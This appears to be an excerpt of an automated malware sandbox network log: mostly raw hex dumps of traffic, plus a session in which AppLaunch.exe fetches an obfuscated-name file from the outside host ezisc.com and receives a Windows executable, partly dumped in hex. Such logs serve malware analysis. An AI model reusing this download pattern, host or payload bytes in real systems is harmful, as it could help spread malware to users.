2022-11-07 22:48:55 UTC	4656	IN	Data Raw: 00 ba 00 ba 00 ba 00 ba 00 ba 00 ba 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 1f 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-11-07 22:48:55 UTC	4672	IN	Data Raw: 00 00 00 11 00 00 00 11 00 00 00 11 00 62 2c 00 00 62 2c 00 00 00 00 00 00 09 d6 ff ff 00 00 00 00 63 2c 00 00 63 2c 00 00 00 00 00 00 1a f1 ff ff 00 00 00 00 64 2c 00 00 64 2c 00 00 00 00 00 00 19 d6 ff ff 00 00 00 00 65 2c 00 00 65 2c 00 00 d5 d5 ff ff 00 00 00 00 d5 d5 ff ff 66 2c 00 00 66 2c 00 00 d8 d5 ff ff 00 00 00 00 d8 d5 ff ff 67 2c 00 00 6c 2c 00 00 00 00 11 00 00 00 11 00 00 00 11 00 6d 2c 00 00 6d 2c 00 00 00 00 00 00 e4 d5 ff ff 00 00 00 00 6e 2c 00 00 6e 2c 00 00 00 00 00 00 03 d6 ff ff 00 00 00 00 6f 2c 00 00 6f 2c 00 00 00 00 00 00 e1 d5 ff ff 00 00 00 00 70 2c 00 00 70 2c 00 00 00 00 00 00 e2 d5 ff ff 00 00 00 00 72 2c 00 00 73 2c 00 00 00 00 11 00 00 00 11 00 00 00 11 00 75 2c 00 00 76 2c 00 00 00 00 11 00 00 00 11 00 00 00 11 00 7e 2c Data Ascii: b,b,c,c,d,d,e,e,f,f,g,l,m,m,n,n,o,o,p,p,r,s,u,v,~,
2022-11-07 22:48:55 UTC	4688	IN	Data Raw: 12 03 14 7f 14 0f 08 3b 08 23 09 a7 0e f3 12 3b 13 1b 0b 8b 0b 4f 0c af 0d d7 10 23 0f 3b 07 7f 09 63 0a c7 0a 97 0b 3f 0f 5b 0f 6b 11 8b 11 63 14 e3 14 f3 14 2f 15 53 07 7f 10 4f 14 cb 14 af 0b 17 07 77 07 67 0a 87 0a af 0c 73 0d c3 0e cb 0f 77 12 17 14 23 16 e3 0c a3 14 33 08 2f 0d 3b 0d 0f 0e 47 0e 4b 0f a7 0f 27 10 0b 11 3b 15 af 07 03 0c b3 14 67 07 ab 0a 2f 0e df 13 67 0b b7 0b 43 0d 2f 0f bb 14 17 08 ff 08 97 0a d3 0c 1f 0d 5f 0d f3 0d 47 0f bb 0f 57 11 f7 12 03 13 57 14 d7 14 83 08 4b 0e 03 09 c7 0e 6b 0f 87 12 bf 14 ab 15 d3 15 37 0d 27 0e c3 11 b7 10 c3 10 e7 10 17 0f 9f 0e 63 13 33 07 2b 12 1b 08 0b 08 0b 0b 2b 0c f3 10 53 0a 03 0e ef 0c e7 13 e7 12 ab 14 23 13 27 0b 87 07 5b 09 00 00 00 00 af 09 00 00 df 0c 00 00 00 00 f7 07 1f 0f e3 0f 47 10 Data Ascii: ;#;O#;c?[kc/SOwgsw#3/;GK';g/gC/_GWWKk7'c3++S#'[G
2022-11-07 22:48:55 UTC	4704	IN	Data Raw: 00 00 00 00 00 0c 0c 0c 0c 0c 0c 0c 0c 00 00 0c 0c 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 0c 0c 0c 0c 0c 00 0c 00 00 00 00 0c 0c 00 0c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-11-07 22:48:55 UTC	4720	IN	Data Raw: 00 08 00 08 00 08 00 08 00 08 00 08 00 08 00 08 00 08 00 08 00 08 00 08 00 08 00 08 00 08 00 40 00 08 00 08 00 08 00 08 00 08 00 08 00 08 00 40 00 08 00 08 00 40 00 08 00 08 00 08 00 08 00 08 00 40 00 08 33 08 33 08 00 08 30 08 30 08 33 08 30 08 30 08 30 08 30 40 00 40 00 08 30 08 30 40 00 40 00 08 30 08 30 08 38 40 00 40 00 08 00 40 00 40 00 40 00 40 00 40 00 40 00 08 30 40 00 40 00 40 00 40 00 40 00 08 00 08 00 08 00 08 00 08 00 08 30 08 30 40 00 40 00 08 33 08 33 08 33 08 33 08 33 08 33 08 33 40 00 40 00 40 00 08 33 08 33 08 33 08 33 08 33 40 00 40 00 40 00 40 00 40 00 40 00 40 00 40 00 40 00 40 00 40 00 39 00 e9 0e 59 11 f9 0e 09 0f 99 11 31 0f 49 02 41 0f 59 02 51 0f 59 03 61 0f 71 0f d9 00 99 0f 39 20 69 02 d9 01 a9 0f b9 0f 89 10 79 02 69 03 89 02 Data Ascii: @@@@330030000@@00@@008@@@@@@@@0@@@@@00@@3333333@@@33333@@@@@@@@@@@9Y1IAYQYaq9 iyi
2022-11-07 22:48:55 UTC	4736	IN	Data Raw: 82 c9 03 47 cc 84 c9 03 47 cc 86 c9 03 47 cc 87 c9 03 47 cc 8c c9 03 47 cc a7 a5 03 48 cc 82 c9 03 48 cc 87 c9 03 48 cc 88 c9 03 48 cc 8c c9 03 48 cc a3 b5 03 48 cc a7 a5 03 48 cc ae b5 03 49 cc 80 c9 03 49 cc 81 c9 03 49 cc 82 c9 03 49 cc 83 c9 03 49 cc 84 c9 03 49 cc 86 c9 03 49 cc 87 c9 03 49 cc 89 c9 03 49 cc 8c c9 03 49 cc 8f c9 03 49 cc 91 c9 03 49 cc a3 b5 03 49 cc a8 a5 03 49 cc b0 b5 03 4a cc 82 c9 03 4b cc 81 c9 03 4b cc 8c c9 03 4b cc a3 b5 03 4b cc a7 a5 03 4b cc b1 b5 03 4c cc 81 c9 03 4c cc 8c c9 03 4c cc a7 a5 03 4c cc ad b5 03 4c cc b1 b5 03 4d cc 81 c9 03 4d cc 87 c9 03 4d cc a3 b5 03 4e cc 80 c9 03 4e cc 81 c9 03 4e cc 83 c9 03 4e cc 87 c9 03 4e cc 8c c9 03 4e cc a3 b5 03 4e cc a7 a5 03 4e cc ad b5 03 4e cc b1 b5 03 4f cc 80 c9 03 4f cc Data Ascii: GGGGGHHHHHHHIIIIIIIIIIIIIIJKKKKKLLLLLMMMNNNNNNNNNOO
2022-11-07 22:48:55 UTC	4752	IN	Data Raw: 01 e1 ac 7f 00 35 16 ca 00 38 e6 84 00 01 56 b7 00 6d be 2a 00 f3 44 ae 01 6d e4 9a 00 c8 b1 7a 01 23 a0 b7 ff b1 30 55 ff 5a da a9 ff f8 98 4e 00 ca fe 6e 00 06 34 2b 00 8e 62 41 ff 3f 91 16 00 46 6a 5d 00 e8 8a 6b 01 6e b3 3d ff d3 81 da 01 f2 d1 5c 00 23 5a d9 01 b6 8f 6a ff 74 65 d9 ff 72 fa dd ff ad cc 06 00 3c 96 a3 00 49 ac 2c ff ef 6e 50 ff ed 4c 99 fe a1 8c f9 00 95 e8 e5 00 85 1f 28 ff ae a4 77 00 71 33 d6 00 81 e4 02 fe 40 22 f3 00 6b e3 f4 ff ae 6a c8 ff 54 99 46 01 32 23 10 00 fa 4a d8 fe ec bd 42 ff 99 f9 0d 00 e6 b2 04 ff dd 29 ee 00 76 e3 79 ff 5e 57 8c fe fe 77 5c 00 49 ef f6 fe 75 57 80 00 13 d3 91 ff b1 2e fc 00 e5 5b f6 01 45 80 f7 ff ca 4d 36 01 08 0b 09 ff 99 60 a6 00 d9 d6 ad ff 86 c0 02 01 00 cf 00 00 bd ae 6b 01 8c 86 64 00 9e c1 Data Ascii: 58Vm*Dmz#0UZNn4+bA?Fj]kn=\#Zjter<I,nPL(wq3@"kjTF2#JB)vy^Ww\IuW.[EM6`kd
2022-11-07 22:48:55 UTC	4768	IN	Data Raw: 00 bd bb e3 ff d0 16 8c 00 d9 d3 74 00 32 51 ba fe 8b fa 1f 00 1e 40 c6 01 87 9b 64 00 a0 ce 17 fe bb a2 d3 ff 10 bc 3f 00 fe d0 31 00 55 54 bf 00 f1 c0 f2 ff 99 7e 91 01 ea a2 a2 ff e6 61 d8 01 40 87 7e 00 be 94 df 01 34 00 2b ff 1c 27 bd 01 40 88 ee 00 af c4 b9 00 62 e2 d5 ff 7f 9f f4 01 e2 af 3c 00 a0 e9 8e 01 b4 f3 cf ff 45 98 59 01 1f 65 15 00 90 19 a4 fe 8b bf d1 00 5b 19 79 00 20 93 05 00 27 ba 7b ff 3f 73 e6 ff 5d a7 c6 ff 8f d5 dc ff b3 9c 13 ff 19 42 7a 00 d6 a0 d9 ff 02 2d 3e ff 6a 4f 92 fe 33 89 63 ff 57 64 e7 ff af 91 e8 ff 65 b8 01 ff ae 09 7d 00 52 25 a1 01 24 72 8d ff 30 de 8e ff f5 ba 9a 00 05 ae dd fe 3f 72 9b ff 87 37 a0 01 50 1f 87 00 7e fa b3 01 ec da 2d 00 14 1c 91 01 10 93 49 00 f9 bd 84 01 11 bd c0 ff df 8e c6 ff 48 14 0f ff fa 35 Data Ascii: t2Q@d?1UT~a@~4+'@b<EYe[y '{?s]Bz->jO3cWde}R%$r0?r7P~-IH5
2022-11-07 22:48:55 UTC	4784	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 40 a6 87 00 00 00 00 00 1d 00 00 00 00 00 00 00 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 48 87 00 00 00 00 00 03 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 50 87 00 00 00 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 8f 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 57 87 00 00 00 00 00 03 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 Data Ascii: @HP W
2022-11-07 22:48:55 UTC	4800	IN	Data Raw: 00 00 00 00 00 11 00 00 00 00 00 00 00 a1 40 6e 00 00 00 00 00 10 00 00 00 00 00 00 00 15 20 6e 00 00 00 00 00 09 00 00 00 00 00 00 00 34 24 6e 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 87 00 00 00 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 7b 87 00 00 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 60 7b 87 00 00 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 c0 7b 87 00 00 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 20 7c 87 00 00 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 80 7c 87 00 00 00 00 00 09 00 Data Ascii: @n n4$n^{`{{ \|\|
2022-11-07 22:48:55 UTC	4816	IN	Data Raw: a2 10 a2 38 a2 40 a2 50 a2 78 a2 80 a2 90 a2 b8 a2 c0 a2 d0 a2 f8 a2 00 a3 10 a3 38 a3 40 a3 50 a3 78 a3 80 a3 90 a3 b8 a3 c0 a3 d0 a3 f8 a3 00 a4 10 a4 38 a4 40 a4 50 a4 78 a4 80 a4 90 a4 b8 a4 c0 a4 d0 a4 f8 a4 00 a5 10 a5 38 a5 40 a5 50 a5 78 a5 80 a5 90 a5 b8 a5 c0 a5 d0 a5 f8 a5 00 a6 10 a6 38 a6 40 a6 50 a6 78 a6 80 a6 90 a6 b8 a6 c0 a6 d0 a6 f8 a6 00 a7 10 a7 38 a7 40 a7 50 a7 78 a7 80 a7 90 a7 b8 a7 c0 a7 d0 a7 f8 a7 00 a8 10 a8 38 a8 40 a8 50 a8 78 a8 80 a8 90 a8 b8 a8 c0 a8 d0 a8 f8 a8 00 a9 10 a9 38 a9 40 a9 50 a9 78 a9 80 a9 90 a9 b8 a9 c0 a9 d0 a9 f8 a9 00 aa 10 aa 38 aa 40 aa 50 aa 78 aa 80 aa 90 aa b8 aa c0 aa d0 aa f8 aa 00 ab 10 ab 38 ab 40 ab 50 ab 78 ab 80 ab 90 ab b8 ab c0 ab d0 ab f8 ab 00 ac 10 ac 38 ac 40 ac 50 ac 78 ac 80 ac 90 ac Data Ascii: 8@Px8@Px8@Px8@Px8@Px8@Px8@Px8@Px8@Px8@Px8@Px
2022-11-07 22:48:55 UTC	4832	IN	Data Raw: ac 68 ac 78 ac 80 ac c0 ac d0 ac d8 ac f0 ac f8 ac 08 ad 10 ad 20 ad 28 ad 38 ad 40 ad 80 ad 90 ad 98 ad b0 ad b8 ad c8 ad d0 ad e0 ad e8 ad f8 ad 00 ae 40 ae 50 ae 58 ae 70 ae 78 ae 88 ae 90 ae a0 ae a8 ae b8 ae c0 ae 00 af 10 af 18 af 30 af 38 af 48 af 50 af 60 af 68 af 78 af 80 af c0 af d0 af d8 af f0 af f8 af 00 a0 2b 00 ca 01 00 00 08 a0 10 a0 20 a0 28 a0 38 a0 40 a0 80 a0 90 a0 98 a0 b0 a0 b8 a0 c8 a0 d0 a0 e0 a0 e8 a0 f8 a0 00 a1 40 a1 50 a1 58 a1 70 a1 78 a1 88 a1 90 a1 a0 a1 a8 a1 b8 a1 c0 a1 00 a2 10 a2 18 a2 30 a2 38 a2 48 a2 50 a2 60 a2 68 a2 78 a2 80 a2 c0 a2 d0 a2 d8 a2 f0 a2 f8 a2 08 a3 10 a3 20 a3 28 a3 38 a3 40 a3 80 a3 90 a3 98 a3 b0 a3 b8 a3 c8 a3 d0 a3 e0 a3 e8 a3 f8 a3 00 a4 40 a4 50 a4 58 a4 70 a4 78 a4 88 a4 90 a4 a0 a4 a8 a4 b8 a4 Data Ascii: hx (8@@PXpx08HP`hx+ (8@@PXpx08HP`hx (8@@PXpx
2022-11-07 22:48:55 UTC	4848	IN	Data Raw: af 40 af 60 af 80 af a0 af c0 af e0 af 00 70 33 00 08 01 00 00 00 a0 20 a0 40 a0 60 a0 80 a0 a0 a0 c0 a0 e0 a0 00 a1 20 a1 40 a1 60 a1 80 a1 a0 a1 c0 a1 e0 a1 00 a2 20 a2 40 a2 60 a2 80 a2 a0 a2 c0 a2 e0 a2 00 a3 20 a3 40 a3 60 a3 80 a3 a0 a3 c0 a3 e0 a3 00 a4 20 a4 40 a4 60 a4 80 a4 a0 a4 c0 a4 e0 a4 00 a5 20 a5 40 a5 60 a5 80 a5 a0 a5 c0 a5 e0 a5 00 a6 20 a6 40 a6 60 a6 80 a6 a0 a6 c0 a6 e0 a6 00 a7 20 a7 40 a7 60 a7 80 a7 a0 a7 c0 a7 e0 a7 00 a8 20 a8 40 a8 60 a8 80 a8 a0 a8 c0 a8 e0 a8 00 a9 20 a9 40 a9 60 a9 80 a9 a0 a9 c0 a9 e0 a9 00 aa 20 aa 40 aa 60 aa 80 aa a0 aa c0 aa e0 aa 00 ab 20 ab 40 ab 60 ab 80 ab a0 ab c0 ab e0 ab 00 ac 20 ac 40 ac 60 ac 80 ac a0 ac c0 ac e0 ac 00 ad 20 ad 40 ad 60 ad 80 ad a0 ad c0 ad e0 ad 00 ae 20 ae 40 ae 60 ae 80 ae Data Ascii: @`p3 @` @` @` @` @` @` @` @` @` @` @` @` @` @` @`
2022-11-07 22:48:55 UTC	4864	IN	Data Raw: a3 c0 a3 f8 a3 00 a4 18 a4 78 a4 a8 a4 b0 a4 c0 a4 d0 a4 30 a5 60 a5 68 a5 d8 a5 08 a6 10 a6 88 a6 c0 a6 c8 a6 e0 a6 50 a7 80 a7 88 a7 98 a7 50 a8 80 a8 88 a8 d8 a8 08 a9 10 a9 60 a9 90 a9 98 a9 c0 a9 f0 a9 f8 a9 70 aa a0 aa a8 aa 68 ab 98 ab a0 ab 68 ac 98 ac a0 ac b0 ac a0 ad d0 ad d8 ad e8 ad 70 ae a8 ae b0 ae c8 ae 78 af a8 af b0 af 00 10 36 00 94 00 00 00 00 a0 30 a0 38 a0 68 a0 a0 a0 a8 a0 c0 a0 a0 a2 d8 a2 e0 a2 f8 a2 50 a3 88 a3 90 a3 a8 a3 00 a4 38 a4 40 a4 58 a4 80 a5 b8 a5 c0 a5 d8 a5 50 a6 80 a6 88 a6 98 a6 08 a7 40 a7 48 a7 60 a7 c8 a7 00 a8 08 a8 20 a8 d8 a9 10 aa 18 aa 30 aa d0 aa 00 ab 08 ab 58 ab 90 ab 98 ab b0 ab 18 ac 48 ac 50 ac 88 ac b8 ac c0 ac 10 ad 40 ad 48 ad 98 ad c8 ad d0 ad 10 ae 40 ae 48 ae a0 ae d0 ae d8 ae e8 ae 40 af 70 af Data Ascii: x0`hPP`phhpx608hP8@XP@H` 0XHP@H@H@p
2022-11-07 22:48:55 UTC	4880	IN	Data Raw: ad 98 ad c0 ad e8 ad f0 ad 20 ae 48 ae 50 ae 80 ae a8 ae b0 ae e8 ae 10 af 18 af 40 af 68 af 70 af a0 af c8 af d0 af 00 20 3d 00 10 01 00 00 00 a0 28 a0 30 a0 60 a0 88 a0 90 a0 c0 a0 e8 a0 f0 a0 28 a1 50 a1 58 a1 88 a1 b0 a1 b8 a1 e0 a1 08 a2 10 a2 40 a2 68 a2 70 a2 98 a2 c0 a2 c8 a2 f0 a2 18 a3 20 a3 48 a3 70 a3 78 a3 a8 a3 d0 a3 d8 a3 08 a4 30 a4 38 a4 60 a4 88 a4 90 a4 c0 a4 e8 a4 f0 a4 20 a5 48 a5 50 a5 80 a5 a8 a5 b0 a5 e0 a5 08 a6 10 a6 38 a6 60 a6 68 a6 98 a6 c0 a6 c8 a6 f0 a6 18 a7 20 a7 50 a7 78 a7 80 a7 b0 a7 d8 a7 e0 a7 10 a8 38 a8 40 a8 68 a8 90 a8 98 a8 c8 a8 f0 a8 f8 a8 20 a9 48 a9 50 a9 80 a9 a8 a9 b0 a9 e0 a9 08 aa 10 aa 40 aa 68 aa 70 aa 98 aa c0 aa c8 aa f0 aa 18 ab 20 ab 50 ab 78 ab 80 ab b0 ab d8 ab e0 ab 10 ac 38 ac 40 ac 78 ac a0 ac Data Ascii: HP@hp =(0`(PX@hp Hpx08` HP8`h Px8@h HP@hp Px8@x
2022-11-07 22:48:55 UTC	4896	IN	Data Raw: 00 00 a0 08 a0 20 a0 28 a0 c8 a0 00 a1 08 a1 20 a1 28 a1 c8 a1 00 a2 08 a2 18 a2 20 a2 50 a3 88 a3 90 a3 a0 a3 a8 a3 b0 a3 70 a8 a8 a8 b0 a8 c0 a8 c8 a8 98 a9 d0 a9 d8 a9 f0 a9 78 ab a8 ab b0 ab 20 ac 58 ac 60 ac 78 ac 28 ad 60 ad 68 ad 78 ad 80 ad 88 ad 78 ae a8 ae b0 ae c0 ae d0 ae 68 af 90 af 98 af c8 af f0 af f8 af 00 80 45 00 86 00 00 00 28 a0 50 a0 58 a0 88 a0 b0 a0 b8 a0 d8 a0 10 a1 18 a1 28 a1 30 a1 48 a5 80 a5 88 a5 a0 a5 48 a6 80 a6 88 a6 a0 a6 a8 a6 28 a7 58 a7 60 a7 00 a8 38 a8 40 a8 58 a8 e8 a8 20 a9 28 a9 40 a9 48 a9 b0 aa e8 aa f0 aa 08 ab 10 ab e0 ab 18 ac 20 ac 38 ac 28 ad 58 ad 60 ad b0 ad d8 ad e0 ad 18 ae 40 ae 48 ae 80 ae a8 ae b0 ae e8 ae 10 af 18 af 40 af 68 af 70 af 98 af d0 af d8 af f0 af 00 90 45 00 98 00 00 00 08 a2 38 a2 40 a2 Data Ascii: ( ( Ppx X`x(`hxxhE(PX(0HH(X`8@X (@H 8(X`@H@hpE8@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49722	35.213.155.151	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-07 22:49:02 UTC	4904	OUT	GET /dmi1dfg7n.iujgy HTTP/1.1 Host: ezisc.com Connection: Keep-Alive
2022-11-07 22:49:03 UTC	4904	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Nov 2022 22:49:03 GMT Content-Length: 2884608 Connection: close X-Content-Type-Options: nosniff Last-Modified: Mon, 07 Nov 2022 11:02:30 GMT ETag: "2c0400-5ecdf5c19a1d4" X-Httpd-Modphp: 1 X-XSS-Protection: 1; mode=block Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache: HIT Accept-Ranges: bytes
2022-11-07 22:49:03 UTC	4904	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 9e 22 43 63 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 1a 03 00 00 00 2c 00 00 10 00 00 e0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 80 2c 00 00 04 00 00 93 e1 2c 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@hr!L!This program cannot be run in DOS mode.$PEd"Cc.$,@,,`
2022-11-07 22:49:03 UTC	4920	IN	Data Raw: 48 01 d5 4c 8d 1c 4f 48 01 d0 48 8d 1c 88 eb 19 0f 1f 44 00 00 48 83 eb 04 49 8d 43 fe 4c 39 df 0f 84 87 00 00 00 49 89 c3 8b 03 48 01 d0 66 81 38 5a 77 75 e0 89 f1 80 38 00 4d 8d 2c cc 0f 84 df 00 00 00 80 78 01 00 41 b8 a3 e2 d0 86 74 2b 41 b9 01 00 00 00 b9 01 00 00 00 66 90 45 89 c2 0f b7 0c 08 41 83 c1 01 41 c1 ca 08 44 01 d1 41 31 c8 44 89 c9 80 3c 08 00 75 e2 41 0f b7 03 45 89 45 00 83 c6 01 8b 44 85 00 41 89 45 04 81 fe f4 01 00 00 0f 85 7b ff ff ff c7 05 49 d0 2a 00 f4 01 00 00 bb f3 01 00 00 eb 0f 66 90 89 35 3a d0 2a 00 83 ee 01 89 f3 74 5b 45 31 db 8d 7b ff 48 8d 35 32 d0 2a 00 66 0f 1f 44 00 00 44 39 db 74 3a 89 fa 48 8d 05 16 d0 2a 00 44 29 da 4c 8d 04 d6 0f 1f 00 8b 50 04 8b 48 0c 39 ca 76 14 44 8b 08 44 8b 50 08 89 48 04 89 50 0c 44 89 10 Data Ascii: HLOHHDHICL9IHf8Zwu8M,xAt+AfEAADA1D<uAEEDAE{If5:t[E1{H52fDD9t:HD)LPH9vDDPHPD
2022-11-07 22:49:03 UTC	4936	IN	Data Raw: 2f 00 00 00 48 89 41 18 48 83 c4 30 5b 5e 41 5c e9 28 c3 ff ff 0f 1f 84 00 00 00 00 00 41 57 41 56 41 55 41 54 55 57 56 53 48 81 ec b8 00 00 00 49 89 cc 4d 89 c5 4d 85 c0 74 32 8b b1 30 01 00 00 85 f6 75 34 41 8b 08 83 f9 50 77 20 4c 8d 05 e5 b4 2a 00 89 ca 49 63 04 90 4c 01 c0 ff e0 4d 89 8c 24 28 01 00 00 66 0f 1f 44 00 00 41 c7 84 24 30 01 00 00 01 00 00 00 48 81 c4 b8 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 49 8b 8c 24 28 01 00 00 45 31 c0 48 8d 44 24 30 48 89 4c 24 30 49 89 84 24 28 01 00 00 49 8b 84 24 20 01 00 00 4c 89 6c 24 38 c7 44 24 40 00 00 00 00 48 89 44 24 48 4d 85 c0 0f 84 cc 01 00 00 ba 11 00 00 00 4c 89 e1 e8 73 34 00 00 44 8b 7c 24 40 45 85 ff 0f 84 4b 24 00 00 48 8b 44 24 30 49 89 84 24 28 01 00 00 85 f6 74 80 49 89 9c 24 20 01 Data Ascii: /HAH0[^A\(AWAVAUATUWVSHIMMt20u4APw L*IcLM$(fDA$0H[^_]A\A]A^A_I$(E1HD$0HL$0I$(I$ Ll$8D$@HD$HMLs4D\|$@EK$HD$0I$(tI$
2022-11-07 22:49:03 UTC	4952	IN	Data Raw: 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 55 57 56 53 48 83 ec 28 48 89 cb 4c 89 c7 4c 89 ce 4d 85 c9 0f 84 56 01 00 00 4c 89 ca 48 8d 0d 00 78 2a 00 44 8b 42 10 45 85 c0 0f 85 3f 01 00 00 48 8b 42 08 8b 00 83 e8 19 83 f8 12 0f 87 1d 01 00 00 48 63 04 81 48 01 c8 ff e0 0f 1f 40 00 0f b6 93 08 01 00 00 48 8b 83 00 01 00 00 80 fa 20 0f 85 29 02 00 00 48 3d ff 00 00 00 0f 84 b4 01 00 00 48 8d 50 01 48 89 93 00 01 00 00 45 31 c9 49 89 f0 48 89 d9 c6 04 03 28 48 8b ab 28 01 00 00 ba 11 00 00 00 c6 83 08 01 00 00 28 48 c7 83 28 01 00 00 00 00 00 00 e8 a2 02 00 00 48 8b 83 00 01 00 00 48 3d ff 00 00 00 0f 84 ff 01 00 00 48 8d 50 01 48 89 93 00 01 00 00 c6 04 03 29 c6 83 08 01 00 00 29 48 81 fa ff 00 00 00 0f 84 c5 00 00 00 48 8d 42 01 48 89 83 00 01 00 00 c6 04 13 Data Ascii: f.UWVSH(HLLMVLHx*DBE?HBHcH@H )H=HPHE1IH(H((H(HH=HPH))HHBH
2022-11-07 22:49:03 UTC	4968	IN	Data Raw: 74 1b 48 85 d2 74 16 8b 01 c1 e8 02 83 e0 01 89 02 31 c0 c3 66 0f 1f 84 00 00 00 00 00 b8 16 00 00 00 c3 66 2e 0f 1f 84 00 00 00 00 00 48 85 c9 74 1b 83 fa 01 77 16 ba 00 00 00 00 b8 28 00 00 00 0f 45 c2 83 21 fb c3 0f 1f 44 00 00 b8 16 00 00 00 c3 66 2e 0f 1f 84 00 00 00 00 00 8b 01 83 e0 18 89 02 31 c0 c3 66 0f 1f 44 00 00 b8 16 00 00 00 41 89 d0 41 83 e0 18 41 83 f8 18 75 0b 8b 01 83 e0 e7 09 c2 31 c0 89 11 c3 66 90 8b 01 c1 e8 05 89 02 31 c0 c3 66 0f 1f 44 00 00 8b 01 83 e0 1f c1 e2 05 01 d0 89 01 31 c0 c3 90 31 c0 48 8b 11 48 85 d2 74 0d 31 c0 81 3a 88 13 6d 40 0f 94 c0 f7 d8 c3 0f 1f 84 00 00 00 00 00 41 56 41 55 41 54 55 57 56 53 48 83 ec 20 4c 8b 2d ab 5d 2a 00 49 8b 45 00 49 89 cc 48 85 c0 0f 84 4b 02 00 00 48 83 78 70 00 0f 85 f0 00 00 00 48 8d Data Ascii: tHt1ff.Htw(E!Df.1fDAAAu1f1fD11HHt1:m@AVAUATUWVSH L-]*IEIHKHxpH
